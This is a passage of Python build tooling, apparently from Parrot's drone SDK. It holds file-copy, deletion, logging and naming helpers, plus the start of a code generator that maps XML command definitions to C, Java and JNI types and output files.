ARAppendToFile(LOGFILE, message)
# Init the default log file
def ARInitLogFile():
LOGFILE = ARPathFromHere('build.log')
ARSetEnv('ARLOGF', LOGFILE)
ARDeleteIfExists(LOGFILE)
# Get the absolute path from a relative path
def ARPathFromHere(path):
MYDIR=os.path.abspath(os.path.dirname(sys.argv[0]))
if '' == MYDIR:
MYDIR=os.getcwd()
return '%(MYDIR)s/%(path)s' % locals()
# Get the absolute path from a relative path
def ARPathFromPwd(path):
MYDIR=os.getcwd()
return '%(MYDIR)s/%(path)s' % locals()
# Transform a python list to a bash args list
def ARListAsBashArg(lst):
return ' '.join(lst)
# Checks if file A is newer than file B
def ARFileIsNewerThan(fileA, fileB):
if not os.path.exists(fileA):
return False
if not os.path.exists(fileB):
return True
return os.stat(fileA).st_mtime > os.stat(fileB).st_mtime
# Called at the beginning of a function to log its start with all its arguments
def StartDumpArgs(**kwargs):
CallerName = inspect.stack()[1][3]
if len(kwargs) > 0:
ARLog('Start running %(CallerName)s with args:' % locals())
else:
ARLog('Start running %(CallerName)s' % locals())
for key, value in kwargs.items():
ARLog(' -- %(key)s -> %(value)s' % locals())
# Called at the end of a function to log its return status and all its arguments
# (use 'return EndDumpArgs(res=True/False, args)')
def EndDumpArgs(res, **kwargs):
CallerName = inspect.stack()[1][3]
START_MSG = 'Finished'
if not res:
START_MSG = 'Error while'
if len(kwargs) > 0:
ARLog('%(START_MSG)s running %(CallerName)s with args:' % locals())
else:
ARLog('%(START_MSG)s running %(CallerName)s' % locals())
for key, value in kwargs.items():
ARLog(' -- %(key)s -> %(value)s' % locals())
return res
# Copy and replace a file
def ARCopyAndReplaceFile(SrcFile, DstFile):
if not os.path.exists(SrcFile):
raise Exception('%(SrcFile)s does not exist' % locals())
if not os.path.exists(os.path.dirname(DstFile)):
os.makedirs(os.path.dirname(DstFile))
shutil.copy2(SrcFile, DstFile)
def ar_copytree(src, dst, symlinks=False, ignore=None):
names = os.listdir(src)
if ignore is not None:
ignored_names = ignore(src, names)
else:
ignored_names = set()
if not os.path.exists(dst):
os.makedirs(dst)
errors = []
for name in names:
if name in ignored_names:
continue
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if symlinks and os.path.islink(srcname):
linkto = os.readlink(srcname)
os.symlink(linkto, dstname)
elif os.path.isdir(srcname):
ar_copytree(srcname, dstname, symlinks, ignore)
else:
shutil.copy2(srcname, dstname)
# XXX What about devices, sockets etc.?
except (IOError, os.error) as why:
errors.append((srcname, dstname, str(why)))
# catch the Error from the recursive copytree so that we can
# continue with other files
except shutil.Error as err:
errors.extend(err.args[0])
try:
shutil.copystat(src, dst)
except shutil.WindowsError:
# can't copy file access times on Windows
pass
except OSError as why:
errors.extend((src, dst, str(why)))
if errors:
raise shutil.Error(errors)
# Recursive copy and replace of a directory.
# Can optionnaly delete the previous content of the destination directory
# instead of merging
def ARCopyAndReplace(SrcRootDir, DstRootDir, deletePrevious=False, ignoreRegexpsForDeletion=[]):
if not os.path.exists(SrcRootDir):
raise Exception('%(SrcRootDir)s does not exist' % locals())
if deletePrevious:
if ignoreRegexpsForDeletion:
ARDeleteRecursivelyNonMatching(DstRootDir, regex=ignoreRegexpsForDeletion)
else:
ARDeleteIfExists(DstRootDir)
ar_copytree(SrcRootDir, DstRootDir, symlinks=True)
else:
if not os.path.exists(DstRootDir):
os.makedirs(DstRootDir)
for SrcDir, directories, files in os.walk(SrcRootDir):
DstDir = SrcDir.replace(SrcRootDir, DstRootDir)
if not os.path.exists(DstDir):
os.mkdir(DstDir)
for _file in files:
SrcFile = os.path.join(SrcDir, _file)
DstFile = os.path.join(DstDir, _file)
ARDeleteIfExists(DstFile)
shutil.copy2(SrcFile, DstFile)
# Delete one or multiple files/directories
# Do not throw an error if the file/directory does not exists
def ARDeleteIfExists(*args):
for fileOrDir in args:
if os.path.exists(fileOrDir):
if os.path.isdir(fileOrDir):
shutil.rmtree(fileOrDir)
else:
os.remove(fileOrDir)
# Delete a file if it does not match any given regex
def ARDeleteFileIfNonMatching(path, regex=[]):
if os.path.exists(path):
name = os.path.basename(path)
for exp in regex:
if re.match(exp, name):
break
else:
ARDeleteIfExists(path)
# Delete a directory contents except for files matching any given regex in a list
# Also deletes empty directories
def ARDeleteRecursivelyNonMatching(path, regex=[]):
if not os.path.isdir(path):
ARDeleteFileIfNonMatching(path, regex=regex)
else:
for tst in os.listdir(path):
ARDeleteRecursivelyNonMatching(os.path.join(path, tst), regex=regex)
try:
os.rmdir(path)
except OSError as e:
if e.errno != errno.ENOTEMPTY:
raise e
# Gets the number of available CPUs
# If the real number can not be determined, return 1
def ARGetNumberOfCpus():
try:
import multiprocessing
return multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
pass
return 1
def ARReplaceEnvVars(source):
envMatches = re.findall(r'%\{.*?\}%', source)
for _match in envMatches:
Match = _match.replace('%{', '').replace('}%', '')
try:
EnvMatch = os.environ[Match]
source = source.replace(_match, EnvMatch)
except (KeyError):
ARLog('Environment variable %(Match)s is not set !' % locals())
return None
return source
def ARReplaceFileIfDifferent(oldFile, newFile):
if not os.path.exists(oldFile) or not filecmp.cmp(oldFile, newFile):
ARDeleteIfExists(oldFile)
os.rename(newFile, oldFile)
else:
ARDeleteIfExists(newFile)
def ARCapitalize (arstr):
nameParts = arstr.split('_')
name = ''
for part in nameParts:
if len(part) > 1:
name = name + part[0].upper() + part[1:]
elif len(part) == 1:
name = name + part[0].upper()
return name
def ARUncapitalize (arstr):
if len(arstr) > 1:
return arstr[0].lower() + arstr[1:]
elif len(arstr) == 1:
return arstr[0].lower()
else:
return ''
def ARStringIsInteger(arstr):
try:
int(arstr)
return True
except ValueError:
return False
#
# Name generation functions
#
def ARMacroName (Module, Submodule, Name):
# MODULE_SUBMODULE_NAME
return Module.upper () + '_' + Submodule.upper () + '_' + Name.upper ()
def ARFunctionName (Module, Submodule, Name):
# MODULE_Submodule_Name
return Module.upper () + '_' + ARCapitalize (Submodule) + '_' + ARCapitalize (Name)
def ARTypeName (Module, Submodule, Name):
# MODULE_Submodule[_Name]_t
if '' != Name:
return Module.upper () + '_' + ARCapitalize (Submodule) + '_' + ARCapitalize (Name) + '_t'
else:
return Module.upper () + '_' + ARCapitalize (Submodule) + '_t'
def ARGlobalName (Module, Submodule, Name):
# MODULE_Submodule_Name
return Module.upper () + '_' + ARCapitalize (Submodule) + '_' + ARCapitalize (Name)
def ARGlobalConstName (Module, Submodule, Name):
# cMODULE_Submodule_Name
return 'c' + Module.upper () + '_' + ARCapitalize (Submodule) + '_' + ARCapitalize (Name)
def AREnumValue (Module, Submodule, Enum, Name):
# MODULE_SUBMODULE_ENUM_NAME
if Enum.upper () == 'ERROR' and (Name.upper () == 'OK' or Name.upper () == 'ERROR'):
return Module.upper () + '_' + Submodule.upper () + '_' + Name.upper ()
else:
return Module.upper () + '_' + Submodule.upper () + '_' + Enum.upper () + '_' + Name.upper ()
def AREnumName (Module, Submodule, Enum):
# eMODULE_SUBMODULE_ENUM
return 'e' + Module.upper () + '_' + Submodule.upper () + '_' + Enum.upper ()
def ARFlagValue (Module, Submodule, Enum, Name):
return Module.upper () + '_FLAG_' + Submodule.upper () + '_' + Enum.upper () + '_' + Name.upper ()
def ARJavaEnumType (Module, Submodule, Enum):
# MODULE_SUBMODULE_ENUM_"ENUM"
return Module.upper () + '_' + Submodule.upper () + '_' + Enum.upper () + '_ENUM'
def ARJavaMultiSetType (Module, Submodule, multiset):
# ModuleSubmoduleName
return Module+ ARCapitalize (Submodule) + ARCapitalize (multiset)
def ARJavaEnumValDef (Module, Submodule, Enum, Name, oldFormat=False):
# MODULE_SUBMODULE_ENUM_NAME
if oldFormat:
return AREnumValue (Module, Submodule, Enum, Name)
elif Name[0].isdigit():
return Enum.upper() + '_' + Name.upper ()
else:
return Name.upper ()
def ARJavaEnumValue (Module, Submodule, Enum, Name, oldFormat=False):
# MODULE_SUBMODULE_ENUM_"ENUM".MODULE_SUBMODULE_ENUM_NAME
return ARJavaEnumType (Module, Submodule, Enum) + '.' + ARJavaEnumValDef (Module, Submodule, Enum, Name, oldFormat)
```
#### File: libARCommands/Tools/libARCommandsgen.py
```python
import sys
import os
import re
import arsdkparser
MYDIR=os.path.abspath(os.path.dirname(__file__))
LIBARCOMMANDS_DIR=os.path.realpath(os.path.join(MYDIR, ".."))
PACKAGES_DIR=os.path.realpath(os.path.join(MYDIR, "../.."))
sys.path.append('%(MYDIR)s/../../ARSDKBuildUtils/Utils/Python' % locals())
from ARFuncs import *
from arsdkparser import *
LIB_NAME = 'libARCommands'
LIB_MODULE = LIB_NAME.replace ('lib', '')
#################################
# CONFIGURATION : #
#################################
# Setup XML and C/HFiles Names #
# Public header names must be #
# LIB_NAME + '/fileName.h' #
#################################
SDK_PACKAGE_ROOT='com.parrot.arsdk.'
JNI_PACKAGE_NAME=SDK_PACKAGE_ROOT + LIB_MODULE.lower ()
JNI_PACKAGE_DIR = JNI_PACKAGE_NAME.replace ('.', '/')
# Default project name
DEFAULTPROJECTNAME='common'
#Name of the output public header containing id enums
COMMANDSID_HFILE_NAME=LIB_NAME + '/ARCOMMANDS_Ids.h'
#Name of the output public header containing typedefs
COMMANDSTYPES_HFILE_NAME=LIB_NAME + '/ARCOMMANDS_Types.h'
#Name of the output public header containing encoder helpers
COMMANDSGEN_HFILE_NAME=LIB_NAME + '/ARCOMMANDS_Generator.h'
#Name of the output public header containing decoder helpers
COMMANDSDEC_HFILE_NAME=LIB_NAME + '/ARCOMMANDS_Decoder.h'
#Name of the output public header containing filter helpers
COMMANDSFIL_HFILE_NAME=LIB_NAME + '/ARCOMMANDS_Filter.h'
#Name of the output internal header containing reader/writer functions prototypes
COMMANDSRW_HFILE_NAME='ARCOMMANDS_ReadWrite.h'
#Name of the output C file containing reader/writer functions
COMMANDSRW_CFILE_NAME='ARCOMMANDS_ReadWrite.c'
#Name of the output C file containing encoder helpers
COMMANDSGEN_CFILE_NAME='ARCOMMANDS_Generator.c'
#Name of the output C file containing decoder helpers
COMMANDSDEC_CFILE_NAME='ARCOMMANDS_Decoder.c'
#Name of the output C file containing filter helpers
COMMANDSFIL_CFILE_NAME='ARCOMMANDS_Filter.c'
#Name of the output C/H common testbench file
TB_CFILE_NAME='autoTest.c'
TB_HFILE_NAME='autoTest.h'
#Tag for tb ARSAL_PRINT calls
TB_TAG='AutoTest'
#Name of the linux entry point file for autotest
TB_LIN_CFILE_NAME='autoTest_linux.c'
#Name of the JNI C File
JNI_CFILE_NAME='ARCOMMANDS_JNI.c'
JNI_DECODER_CFILE_NAME='ARCOMMANDS_JNIDecoder.c'
JNI_FILTER_CFILE_NAME='ARCOMMANDS_JNIFilter.c'
#Name of the JNI JAVA File
JNI_JFILE_NAME='ARCommand.java'
JNI_DECODER_JFILE_NAME='ARCommandsDecoder.java'
JNIClassName, _ = os.path.splitext (JNI_JFILE_NAME)
JNIDecoderClassName, _ = os.path.splitext (JNI_DECODER_JFILE_NAME)
JNI_FILTER_JFILE_NAME='ARCommandsFilter.java'
JNIFilterClassName, _ = os.path.splitext (JNI_FILTER_JFILE_NAME)
#Name of the JNI JAVA Interfaces files (DO NOT MODIFY)
JAVA_INTERFACES_FILES_NAME=JNIClassName + '*Listener.java'
JAVA_ENUM_FILES_NAME=JNIClassName.upper() + '*_ENUM.java'
def _get_args_without_multiset(args):
for arg in args:
if not isinstance(arg.argType, arsdkparser.ArMultiSetting):
yield arg
def _get_args_multiset(args):
for arg in args:
if isinstance(arg.argType, arsdkparser.ArMultiSetting):
yield arg
class Paths:
def __init__(self, outdir):
#Relative path of SOURCE dir
self.SRC_DIR=outdir+'/Sources/'
#Relative path of INCLUDES dir
self.INC_DIR=outdir+'/Includes/'
#Relative path of TESTBENCH dir
self.TB__DIR=outdir+'/TestBench/'
#Relative path of unix-like (Linux / os-x) TESTBENCH dir
self.LIN_TB_DIR=self.TB__DIR + 'linux/'
#Relative path of multiplatform code for testbenches
self.COM_TB_DIR=self.TB__DIR + 'common/'
#Relative path of JNI dir
self.JNI_DIR=outdir+'/JNI/'
#Relative path of JNI/C dir
self.JNIC_DIR=self.JNI_DIR + 'c/'
#Relative path of JNI/Java dir
self.JNIJ_DIR=self.JNI_DIR + 'java/'
self.JNIJ_OUT_DIR=self.JNIJ_DIR + JNI_PACKAGE_DIR + '/'
# Create array of generated files (so we can cleanup only our files)
self.GENERATED_FILES = []
self.COMMANDSID_HFILE=self.INC_DIR + COMMANDSID_HFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSID_HFILE)
self.COMMANDSGEN_HFILE=self.INC_DIR + COMMANDSGEN_HFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSGEN_HFILE)
self.COMMANDSTYPES_HFILE=self.INC_DIR + COMMANDSTYPES_HFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSTYPES_HFILE)
self.COMMANDSGEN_CFILE=self.SRC_DIR + COMMANDSGEN_CFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSGEN_CFILE)
self.COMMANDSDEC_HFILE=self.INC_DIR + COMMANDSDEC_HFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSDEC_HFILE)
self.COMMANDSDEC_CFILE=self.SRC_DIR + COMMANDSDEC_CFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSDEC_CFILE)
self.COMMANDSFIL_HFILE=self.INC_DIR + COMMANDSFIL_HFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSFIL_HFILE)
self.COMMANDSFIL_CFILE=self.SRC_DIR + COMMANDSFIL_CFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSFIL_CFILE)
self.COMMANDSRW_HFILE=self.SRC_DIR + COMMANDSRW_HFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSRW_HFILE)
self.COMMANDSRW_CFILE=self.SRC_DIR + COMMANDSRW_CFILE_NAME
self.GENERATED_FILES.append (self.COMMANDSRW_CFILE)
self.TB_CFILE=self.COM_TB_DIR + TB_CFILE_NAME
self.GENERATED_FILES.append (self.TB_CFILE)
self.TB_HFILE=self.COM_TB_DIR + TB_HFILE_NAME
self.GENERATED_FILES.append (self.TB_HFILE)
self.TB_LIN_CFILE=self.LIN_TB_DIR + TB_LIN_CFILE_NAME
self.GENERATED_FILES.append (self.TB_LIN_CFILE)
# Create array of generated JNI files (so we can cleanup only our files)
self.GENERATED_JNI_FILES = []
self.JNI_CFILE=self.JNIC_DIR + JNI_CFILE_NAME
self.GENERATED_JNI_FILES.append (self.JNI_CFILE)
self.JNI_DECODER_CFILE=self.JNIC_DIR + JNI_DECODER_CFILE_NAME
self.GENERATED_JNI_FILES.append (self.JNI_DECODER_CFILE)
self.JNI_FILTER_CFILE=self.JNIC_DIR + JNI_FILTER_CFILE_NAME
self.GENERATED_JNI_FILES.append (self.JNI_FILTER_CFILE)
# Create array of generated JAVA files (so we can cleanup only our files)
self.GENERATED_JAVA_FILES = []
self.JNI_JFILE=self.JNIJ_OUT_DIR + JNI_JFILE_NAME
self.GENERATED_JAVA_FILES.append (self.JNI_JFILE)
self.JNI_DECODER_JFILE=self.JNIJ_OUT_DIR + JNI_DECODER_JFILE_NAME
self.GENERATED_JAVA_FILES.append (self.JNI_DECODER_JFILE)
self.JNI_FILTER_JFILE=self.JNIJ_OUT_DIR + JNI_FILTER_JFILE_NAME
self.GENERATED_JAVA_FILES.append (self.JNI_FILTER_JFILE)
self.JAVA_INTERFACES_FILES=self.JNIJ_OUT_DIR + JAVA_INTERFACES_FILES_NAME
self.JAVA_ENUM_FILES=self.JNIJ_OUT_DIR + JAVA_ENUM_FILES_NAME
##### END OF CONFIG #####
# Create names for #ifndef _XXX_ statements in .h files
COMMANDSID_DEFINE='_' + COMMANDSID_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_'
COMMANDSDEC_DEFINE='_' + COMMANDSDEC_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_'
COMMANDSGEN_DEFINE='_' + COMMANDSGEN_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_'
COMMANDSTYPES_DEFINE='_' + COMMANDSTYPES_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_'
COMMANDSRW_DEFINE='_' + COMMANDSRW_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_'
COMMANDSFIL_DEFINE='_' + COMMANDSFIL_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_'
TB_DEFINE='_' + TB_HFILE_NAME.upper ().replace ('/', '_').replace ('.', '_') + '_'
# Submodules names
ID_SUBMODULE='ID'
GEN_SUBMODULE='Generator'
DEC_SUBMODULE='Decoder'
FIL_SUBMODULE='Filter'
RW_SUBMODULE='ReadWrite'
TB_SUBMODULE='Testbench'
JNI_SUBMODULE='JNI'
JNI_FILTER_SUBMODULE='JNI_FILTER'
hasArgOfType = {ArArgType.U8 : True, ArArgType.I8 : False,
ArArgType.U16 : True, ArArgType.I16 : False,
ArArgType.U32 : False, ArArgType.I32 : False,
ArArgType.U64 : False, ArArgType.I64 : False,
ArArgType.FLOAT : False, ArArgType.DOUBLE : False,
ArArgType.STRING : False, ArArgType.ENUM : False,
ArArgType.BITFIELD : False, ArArgType.MULTISETTING : False}
#Type conversion from XML Defined types to many other types
# XML Defined types
XMLTYPES = [ArArgType.U8, ArArgType.I8,
ArArgType.U16, ArArgType.I16,
ArArgType.U32, ArArgType.I32,
ArArgType.U64, ArArgType.I64,
ArArgType.FLOAT, ArArgType.DOUBLE,
ArArgType.STRING]
# Equivalent C types
CTYPES = ['uint8_t', 'int8_t',
'uint16_t', 'int16_t',
'uint32_t', 'int32_t',
'uint64_t', 'int64_t',
'float', 'double',
'char *']
# Equivalent C types with const char *
CTYPES_WC = ['uint8_t', 'int8_t',
'uint16_t', 'int16_t',
'uint32_t', 'int32_t',
'uint64_t', 'int64_t',
'float', 'double',
'const char *']
# Equivalent size for the Generator internal functions
SZETYPES = ['U8', 'U8',
'U16', 'U16',
'U32', 'U32',
'U64', 'U64',
'Float', 'Double',
'String']
# Equivalent calls for the Decoder internal functions
CREADERS = [ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer'), ' (int8_t)' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer'), ' (int16_t)' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read32FromBuffer'), ' (int32_t)' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read32FromBuffer'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read64FromBuffer'), ' (int64_t)' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read64FromBuffer'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadFloatFromBuffer'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadDoubleFromBuffer'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadStringFromBuffer')]
# Equivalent calls for the Decoder print internal functions
CPRINTERS = [ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU8'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI8'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU16'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI16'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU32'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI32'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU64'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI64'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintFloat'), ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintDouble'),
ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintString')]
# Equivalent JAVA Types
# No unsigned types in java, so use signed types everywhere
JAVATYPES = ['byte', 'byte',
'short', 'short',
'int', 'int',
'long', 'long',
'float', 'double',
'String']
# Equivalent JNI Signatures
JAVASIG = ['B', 'B',
'S', 'S',
'I', 'I',
'J', 'J',
'F', 'D',
'Ljava/lang/String;']
# Equivalent JNI types
JNITYPES = ['jbyte', 'jbyte',
'jshort', 'jshort',
'jint', 'jint',
'jlong', 'jlong',
'jfloat', 'jdouble',
'jstring']
# JNI UnsignedToSigned casts
JNIUTSCASTS = ['(jbyte)', '',
'(jshort)', '',
'(jint)', '',
'(jlong)', '',
'', '',
'']
def xmlToC (module, ftr, cmd, arg, is_arg=False):
if isinstance(arg.argType, ArEnum):
return AREnumName (module, get_ftr_old_name(ftr), arg.argType.name)
if isinstance(arg.argType, ArMultiSetting):
ctype = ARTypeName (module, get_ftr_old_name(ftr), arg.argType.name)
if (is_arg):
return ctype + ' *'
return ctype
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return CTYPES [xmlIndex]
def xmlToCcharAreConst (module, ftr, cmd, arg, is_arg=False):
if isinstance(arg.argType, ArEnum):
return AREnumName (module, get_ftr_old_name(ftr), arg.argType.name)
if isinstance(arg.argType, ArMultiSetting):
ctype = ARTypeName (module, get_ftr_old_name(ftr), arg.argType.name)
if (is_arg):
return ctype + ' *'
return ctype
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return CTYPES_WC [xmlIndex]
def xmlToCwithConst (module, ftr, cmd, arg, is_arg=False):
if isinstance(arg.argType, ArEnum):
return AREnumName (module, get_ftr_old_name(ftr), arg.argType.name)
if isinstance(arg.argType, ArMultiSetting):
ctype = 'const ' + ARTypeName (module, get_ftr_old_name(ftr), arg.argType.name)
if is_arg:
return ctype + ' *'
return ctype
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return CTYPES_WC [xmlIndex]
def xmlToSize (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return 'U32';
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return SZETYPES [xmlIndex]
def xmlToReader (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return '(' + AREnumName (LIB_MODULE, get_ftr_old_name(ftr), arg.argType.name) + ')' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read32FromBuffer')
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return CREADERS [xmlIndex]
def xmlToPrinter (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return '(' + AREnumName (LIB_MODULE, get_ftr_old_name(ftr), arg.argType.name) + ')' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI32')
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return CPRINTERS [xmlIndex]
def xmlToJava (module, ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return ARJavaEnumType (module, get_ftr_old_name(ftr), arg.argType.name)
if isinstance(arg.argType, ArMultiSetting):
return ARJavaMultiSetType (module, get_ftr_old_name(ftr), arg.argType.name)
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return JAVATYPES [xmlIndex]
def jniEnumClassName (ftr, cmd, arg):
if not isinstance(arg.argType, ArEnum):
return ''
return JNI_PACKAGE_DIR + '/' + ARJavaEnumType (LIB_MODULE, get_ftr_old_name(ftr), arg.argType.name)
def jniClassName (ftr, cmd, arg):
return JNI_PACKAGE_DIR + '/' + ARJavaMultiSetType (LIB_MODULE, get_ftr_old_name(ftr), arg.argType.name)
def xmlToJavaSig (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return 'L' + jniEnumClassName (ftr, cmd, arg) + ';'
if isinstance(arg.argType, ArMultiSetting):
return 'L' + jniClassName (ftr, cmd, arg) + ';'
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return JAVASIG [xmlIndex]
def xmlToJni (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return 'jint'
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return JNITYPES [xmlIndex]
def xmlToJniCast (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return '(jint)'
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return JNIUTSCASTS [xmlIndex]
def format_cmd_name(msg, underscore=False):#projetc only
if underscore:
return ARCapitalize(msg.name) if msg.cls is None else ARCapitalize(msg.cls.name) + '_'+ ARCapitalize(msg.name)
else:
return msg.name if msg.cls is None else msg.cls.name + ARCapitalize(msg.name)
def get_arg_doc(arg):
doc = ''
if arg.argType in ArArgType.TO_STRING:
doc = arg.doc
else:
if arg.doc:
doc = arg.doc + '\n'
if isinstance(arg.argType, ArEnum):
doc = doc + arg.argType.doc
elif isinstance(arg.argType, ArBitfield):
doc = doc + arg.argType.enum.doc
elif isinstance(arg.argType, ArMultiSetting):
doc = doc + arg.argType.doc
return doc
def get_ftr_old_name(ftr):
FROM_NEW_NAME = { 'ardrone3':'ARDrone3', 'common_dbg':'commonDebug',
'jpsumo':'JumpingSumo', 'minidrone':'MiniDrone',
'skyctrl':'SkyController'}
if ftr.name in FROM_NEW_NAME:
return FROM_NEW_NAME[ftr.name]
else:
return ftr.name
# Sample args for testbench
SAMPLEARGS = ['42', '-42',
'4200', '-4200',
'420000', '-420000',
'420102030405ULL', '-420102030405LL',
'42.125', '-42.000001',
'"Test string with spaces"']
# Formatter for printf
PRINTFF = ['%u', '%d',
'%u', '%d',
'%u', '%d',
'%llu', '%lld',
'%f', '%f',
'%s']
def xmlToSample (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return '(' + AREnumName (LIB_MODULE, get_ftr_old_name(ftr), arg.argType.name) + ')0';
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return SAMPLEARGS [xmlIndex]
def xmlToPrintf (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return '%d';
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return PRINTFF [xmlIndex]
LICENCE_HEADER='''/*
Copyright (C) 2014 Parrot SA
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name of Parrot nor the names
of its contributors may be used to endorse or promote products
derived from this software without specific prior written
permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
*/
'''
DEC_ERR_ENAME='ERROR'
GEN_ERR_ENAME='ERROR'
FIL_STATUS_ENAME='STATUS'
FIL_ERROR_ENAME='ERROR'
def interfaceName (ftr, cmd):
return JNIClassName + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Listener'
def interfaceVar (ftr, cmd):
return '_' + interfaceName (ftr, cmd)
def javaCbName (ftr, cmd):
return 'on' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Update'
def native_generateCmds(ctx, paths):
genDebug = True
genTreeFilename = None
projects = [DEFAULTPROJECTNAME]
if not os.path.exists (paths.SRC_DIR):
os.makedirs (paths.SRC_DIR)
if not os.path.exists (paths.INC_DIR):
os.makedirs (paths.INC_DIR)
if not os.path.exists (paths.INC_DIR + LIB_NAME):
os.makedirs (paths.INC_DIR + LIB_NAME)
#################################
# 1ST PART : #
#################################
# Read XML file to local arrays #
# of commands / classes #
#################################
allFeatures = ctx.features
# Check types used
for ftr in allFeatures:
for msg in ftr.getMsgs():
for arg in msg.args:
if isinstance(arg.argType, ArEnum):
hasArgOfType[ArArgType.ENUM] = True
elif isinstance(arg.argType, ArBitfield):
